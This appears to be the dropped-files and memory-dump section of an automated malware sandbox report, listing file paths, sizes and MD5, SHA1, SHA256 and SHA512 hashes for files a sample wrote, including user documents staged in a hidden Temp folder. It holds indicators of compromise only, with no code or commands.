00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36922\select.pyd

Filesize
24KB

MD5
062f0a9179c51d7ed621dac3dd222abd

SHA1
c7b137a2b1e7b16bfc6160e175918f4d14cf107c

SHA256
91bea610f607c8a10c2e70d687fb02c06b9e1e2fa7fcfab355c6baea6eddb453

SHA512
b5a99efd032f381d63bc46c9752c1ddec902dae7133a696e20d3d798f977365caf25874b287b19e6c52f3e7a8ae1beb3d7536cd114775dc0af4978f21a9e818e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36922\sqlite3.dll

Filesize
606KB

MD5
dcc391b3b52bac0f6bd695d560d7f1a9

SHA1
a061973a5f7c52c34a0b087cc918e29e3e704151

SHA256
762adf4e60bff393fba110af3d9694cbbdc3c6b6cd18855a93411ea8e71a4859

SHA512
42a2606783d448200c552389c59cbf7c5d68a00911b36e526af013e9b8e3a1daa80327cb30efe0fe56323635cc2cb37bd3474b002058ba59f65e2a9d8f6046b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36922\unicodedata.pyd

Filesize
294KB

MD5
26f7ccda6ba4de5f310da1662f91b2ba

SHA1
5fb9472a04d6591ec3fee7911ad5b753c62ecf17

SHA256
1eae07acffb343f4b3a0abbaf70f93b9ec804503598cfffdeec94262b3f52d60

SHA512
0b5e58945c00eefc3b9f21a73359f5751966c58438ae9b86b6d3ffd0f60a648676b68a0109fa2fe1260d1b16c16b026e0c1d596fec3443638d4ce05ea04665ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vykirmeg.pmo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\n5i2omka\n5i2omka.dll

Filesize
4KB

MD5
311d28c4b8701b732b196586e928a8fa

SHA1
0b479c3ee288641d517ee3ce8946ba38de6d0fc1

SHA256
999d8fa6987be4b0be2db17f71068bac6314379f46b7bd4c9cb602eb1a92a25a

SHA512
6e4bdbb3e07587da3715c7dcd865e50b5a3df14e4f5d1c8b61cc5e5c00b6e1cb14f4d86706896baf5b85f0ca8b7659e4c35f223607cb49c0c384fa1c2ca58e47

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\ApproveRename.doc

Filesize
621KB

MD5
5ad21261ef598067e8bf54d393f6e9e6

SHA1
315dcf5677d1e06155c7e7361bdc934ce73c1c53

SHA256
393a9cb45a0d2a34d1ecc79eb456123eeedab2832716963881f0ca29970d657d

SHA512
b8f18e42f38c9ba6b09d873138d5dc9fabcf9d54b290df10a1861769dd57c6a0d1fd3d1bf4bd55b8032e84555c7c61022a538586307ae088594ca6e71e0192de

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\BackupOut.dotm

Filesize
410KB

MD5
add99aba0338bbd4d3f7dfe6a64e23d9

SHA1
b2fe857a7aa17ae0f0505f6b5eee81a7cc54325c

SHA256
21005a81b10ee965aa0d520301bc866e134b3985c5806a5945d3455edab0bca3

SHA512
edcb89a0c2bbb0ce51165bab90ff4a75aaf01e03e90a2278137c05dd06a248838249fcfe19b552bc7be38a10ed305a40f807e0df7ee3324e60e31a804bf8a435

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\BackupPush.ppsm

Filesize
495KB

MD5
2220df2005c5ff60644654c7eb66f5c0

SHA1
307749981b84a304533170a23b02cdbfe47b71b1

SHA256
ef9bb973b3e6f78bfd4f53c4a7e9dc2c14fa1d412db205dd144d2a5cc1c03930

SHA512
84c7e6881ae228ecf62217703840c08844c26357b43b81642eec49e53648f34fc0d82dca880c5c480eefab4e2c5e777cf451dea2c7ec686fc9e50193ef0e39d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\BackupUndo.crw

Filesize
284KB

MD5
d111a62a588a1c32b9d17ef3d8b7906b

SHA1
a2cebb29115c1eba04fa36640d5c480134d2a6c2

SHA256
03b618a55c963df5913e69768f1a3a200b7bbf01a530766b87be1278c5e116f8

SHA512
6bfea5655d160d1e183b1ad2ed0d28f9276accc41be474c93652f643cf0e472d83560a7a24425a8749ef96a207e0cfc75603be9f86e64893612381e453c63836

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\DisableRegister.docx

Filesize
19KB

MD5
df7113e06a8a14349a794aa956148b0c

SHA1
d99cfb102d7b90412c74ba6f12cef56e4421c1f7

SHA256
a2f9ec38f86c159b8623651ba4918c28c168f4bfb2b281ba16af3d61bb99b532

SHA512
e167c3a09c0b69909b9b379edf1ac8de76f5df4bb8089ee7d84a58b95c82849b179c333a69f400ae5314bc5b09c05b668b0e2f158df0bde3b39ab7eb556601e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\ExitOptimize.xlsx

Filesize
9KB

MD5
0262979872a90e39f3aa30e05097545b

SHA1
13c5a6b2903c47c0872fe6c4737302072ee0c1d1

SHA256
31796d3527acc740e1fe58140dcfe37a48d70f1163e85d9d193b03bd25bdabb1

SHA512
ddfd1fa81456a8ca2f4f27faf487b07105106e0f90e564836c8ab38dce4c3258df8a500a17547da5fe6e12a387921e801075897709542dd38d807288cfbf9c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\ExpandEdit.txt

Filesize
663KB

MD5
47e730c05ffbe868ea5e0d6eb7b0c404

SHA1
4286b9be4377acd39efeaf8f4f089cb66fcadeeb

SHA256
452202ed0e1184f68190c23256956b1f8123a759f29d3b1a8e502053cf093f5a

SHA512
66ea89dedb1a14e33a492e688c78c4d22a7eee2119145b3730bdde6d4077dc5247687d540b454a5bd80d640540815c045c07a07f4fcc19330472ed0d4ac7658a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\FormatBackup.docm

Filesize
579KB

MD5
5ab757e664511c72723d85ede730431c

SHA1
fb6fc31e9cf2c6df2d5833991a3da7b23e1caaef

SHA256
dda103bd017423359255cb08fab56e43d8c6f73aeea5518c6dbf54c42fde76d7

SHA512
6556c59634941e4c445dcacbdd7a42b593c9e99b986338978d6b3a3067562d7de54696402b6c62f33974f070c6586c06761d2594bee9c4d97e6d826330aace69

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\MergeRevoke.docx

Filesize
19KB

MD5
5e3660be7ae8dfe9a80d8b9e6e5fa8e1

SHA1
7f3e92a88de75da384216e44c77f30262751b1a3

SHA256
caffcdef209322a0ad9ed629b584641df5ed5e459bfca31d565762a9e7be8d3a

SHA512
642080a24c89ade3fcb1440fc1feba6d14be37aaf6c60887bcf01bbdc7760bcfed1dfa529d08e5f02941b246e14bda7d18bed624c710bbf328ada829d9409c98

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\ResizeRestart.mp3

Filesize
600KB

MD5
7fc6d346f1278f04ac803a8102b889ef

SHA1
d2bad4e8c6524379dcc193868baf8252c9d57e41

SHA256
1ae32c722a51bd3c0f85d281acbe2924162eec9709726dd0711c66ee4a5363ab

SHA512
5d8cc88a8581a342a4033b1b44287132cc30ecf13eda1298863d8f2c94f0aff948f991291a96f9bfad124e6c9aed357eefc23a664f04940d2b205e7b96f59ee8

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Desktop\TestDismount.docx

Filesize
14KB

MD5
2d48180ed81a79bc6ad73116ee5b8448

SHA1
10e7bfd290404ff0992c31ecb86da22840ba5136

SHA256
b78e2e1791c23d1b715c3e09a381b1fedafea3f1994baccd7485fbc0609aa41e

SHA512
34ddd86805647f087dbfa099db2a759aedd0809b179ec655382f707ed26c8a4192872b63a4c4cc01284dcb1f92730c3f41e02d9711e9da19ae3e7f3df006608a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎ ‏‌ ‏ \Common Files\Documents\AssertMove.xlsx

Filesize
10KB

MD5
c321c0f5bd07de828fd71267527f704d

SHA1
4108ae2b2bbadfc8ea28567d1c6b7ad0c5d12d28

SHA256
365b3757cb903633e64b27e88a73d8f9052720bfb6c33e87e046adf7df07875f

SHA512
b72b158428a4fca23d10b679e6e401700fa72347fea90fac4ff58bf2b80ca1aa9c8765b240ee23d9c83860c9988e9a833795057bd06ecedb2318619b96473900

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n5i2omka\CSC9785A5D150024B7A806BACEC582D7899.TMP

Filesize
652B

MD5
9ce309866e9a5a475d1aa5711b2c13b4

SHA1
45064dd0000574005de6759db57cbebf74d36fba

SHA256
1ad136cbbbd090609128879fb7e7233eb6d68802424da6da87d058187f03c71b

SHA512
330c14112237532d1aed58396c021315dc9c0a7ad754b1444c6bfbe37c27e6ac5d898c4b86e42aa7ddc964925616a713e9f706ae1eed764b940698eec27fe99a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n5i2omka\n5i2omka.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n5i2omka\n5i2omka.cmdline

Filesize
607B

MD5
40f48671674f68f327ce7a799ed5c2f7

SHA1
8334cd00bb150cfc06e1f0cc165a487a1ce96c3d

SHA256
81486a56b4d8943001f0bbbc28c19310d5bba31a91e821b8f6cd1a6d9b6b0303

SHA512
1d049e517e9cb6277e0f053db9a2df01103aa770a3be2676e249c066e00a7154690c29f4e16101bf0bf5b4613330e66d5ccacdc13347843dce391e2fb5e78ef9

Download Submit
memory/1332-97-0x00007FF8AAC30000-0x00007FF8AB6F1000-memory.dmp

Filesize
10.8MB

Download
memory/1332-84-0x00007FF8AAC33000-0x00007FF8AAC35000-memory.dmp

Filesize
8KB

Download
memory/1332-95-0x00007FF8AAC30000-0x00007FF8AB6F1000-memory.dmp

Filesize
10.8MB

Download
memory/1332-109-0x00007FF8AAC30000-0x00007FF8AB6F1000-memory.dmp

Filesize
10.8MB

Download
memory/1332-85-0x00000216ACDD0000-0x00000216ACDF2000-memory.dmp

Filesize
136KB

Download
memory/2300-62-0x00007FF8BC340000-0x00007FF8BC359000-memory.dmp

Filesize
100KB

Download
memory/2300-560-0x00007FF8BC370000-0x00007FF8BC393000-memory.dmp

Filesize
140KB

Download
memory/2300-198-0x00007FF8BC190000-0x00007FF8BC1BE000-memory.dmp

Filesize
184KB

Download
memory/2300-83-0x00007FF8BC370000-0x00007FF8BC393000-memory.dmp

Filesize
140KB

Download
memory/2300-70-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp

Filesize
5.9MB

Download
memory/2300-71-0x00007FF8BBC30000-0x00007FF8BBCE8000-memory.dmp

Filesize
736KB

Download
memory/2300-73-0x00007FF8AC150000-0x00007FF8AC4C5000-memory.dmp

Filesize
3.5MB

Download
memory/2300-81-0x00007FF8BDFA0000-0x00007FF8BDFB9000-memory.dmp

Filesize
100KB

Download
memory/2300-82-0x00007FF8ABCC0000-0x00007FF8ABDDC000-memory.dmp

Filesize
1.1MB

Download
memory/2300-555-0x00007FF8AC150000-0x00007FF8AC4C5000-memory.dmp

Filesize
3.5MB

Download
memory/2300-77-0x00007FF8BC170000-0x00007FF8BC184000-memory.dmp

Filesize
80KB

Download
memory/2300-78-0x00007FF8BCB30000-0x00007FF8BCB3D000-memory.dmp

Filesize
52KB

Download
memory/2300-260-0x0000022935C60000-0x0000022935FD5000-memory.dmp

Filesize
3.5MB

Download
memory/2300-255-0x00007FF8BBC30000-0x00007FF8BBCE8000-memory.dmp

Filesize
736KB

Download
memory/2300-79-0x00007FF8BC9C0000-0x00007FF8BC9ED000-memory.dmp

Filesize
180KB

Download
memory/2300-293-0x00007FF8AC150000-0x00007FF8AC4C5000-memory.dmp

Filesize
3.5MB

Download
memory/2300-74-0x00007FF8C0BF0000-0x00007FF8C0C14000-memory.dmp

Filesize
144KB

Download
memory/2300-72-0x0000022935C60000-0x0000022935FD5000-memory.dmp

Filesize
3.5MB

Download
memory/2300-66-0x00007FF8BC190000-0x00007FF8BC1BE000-memory.dmp

Filesize
184KB

Download
memory/2300-64-0x00007FF8C1DD0000-0x00007FF8C1DDD000-memory.dmp

Filesize
52KB

Download
memory/2300-96-0x00007FF8BB230000-0x00007FF8BB3A0000-memory.dmp

Filesize
1.4MB

Download
memory/2300-60-0x00007FF8BB230000-0x00007FF8BB3A0000-memory.dmp

Filesize
1.4MB

Download
memory/2300-556-0x00007FF8C0BF0000-0x00007FF8C0C14000-memory.dmp

Filesize
144KB

Download
memory/2300-113-0x00007FF8BC340000-0x00007FF8BC359000-memory.dmp

Filesize
100KB

Download
memory/2300-24-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp

Filesize
5.9MB

Download
memory/2300-30-0x00007FF8C0BF0000-0x00007FF8C0C14000-memory.dmp

Filesize
144KB

Download
memory/2300-48-0x00007FF8C1DE0000-0x00007FF8C1DEF000-memory.dmp

Filesize
60KB

Download
memory/2300-54-0x00007FF8BC9C0000-0x00007FF8BC9ED000-memory.dmp

Filesize
180KB

Download
memory/2300-309-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp

Filesize
5.9MB

Download
memory/2300-315-0x00007FF8BB230000-0x00007FF8BB3A0000-memory.dmp

Filesize
1.4MB

Download
memory/2300-310-0x00007FF8C0BF0000-0x00007FF8C0C14000-memory.dmp

Filesize
144KB

Download
memory/2300-345-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp

Filesize
5.9MB

Download
memory/2300-565-0x00007FF8BBC30000-0x00007FF8BBCE8000-memory.dmp

Filesize
736KB

Download
memory/2300-564-0x00007FF8BC190000-0x00007FF8BC1BE000-memory.dmp

Filesize
184KB

Download
memory/2300-569-0x00007FF8ABCC0000-0x00007FF8ABDDC000-memory.dmp

Filesize
1.1MB

Download
memory/2300-568-0x00007FF8BCB30000-0x00007FF8BCB3D000-memory.dmp

Filesize
52KB

Download
memory/2300-567-0x00007FF8BC170000-0x00007FF8BC184000-memory.dmp

Filesize
80KB

Download
memory/2300-566-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp

Filesize
5.9MB

Download
memory/2300-563-0x00007FF8C1DD0000-0x00007FF8C1DDD000-memory.dmp

Filesize
52KB

Download
memory/2300-562-0x00007FF8BC340000-0x00007FF8BC359000-memory.dmp

Filesize
100KB

Download
memory/2300-561-0x00007FF8BB230000-0x00007FF8BB3A0000-memory.dmp

Filesize
1.4MB

Download
memory/2300-56-0x00007FF8BDFA0000-0x00007FF8BDFB9000-memory.dmp

Filesize
100KB

Download
memory/2300-559-0x00007FF8BDFA0000-0x00007FF8BDFB9000-memory.dmp

Filesize
100KB

Download
memory/2300-558-0x00007FF8BC9C0000-0x00007FF8BC9ED000-memory.dmp

Filesize
180KB

Download
memory/2300-557-0x00007FF8C1DE0000-0x00007FF8C1DEF000-memory.dmp

Filesize
60KB

Download
memory/2300-58-0x00007FF8BC370000-0x00007FF8BC393000-memory.dmp

Filesize
140KB

Download
memory/4976-229-0x000002B1FA010000-0x000002B1FA018000-memory.dmp

Filesize
32KB

Download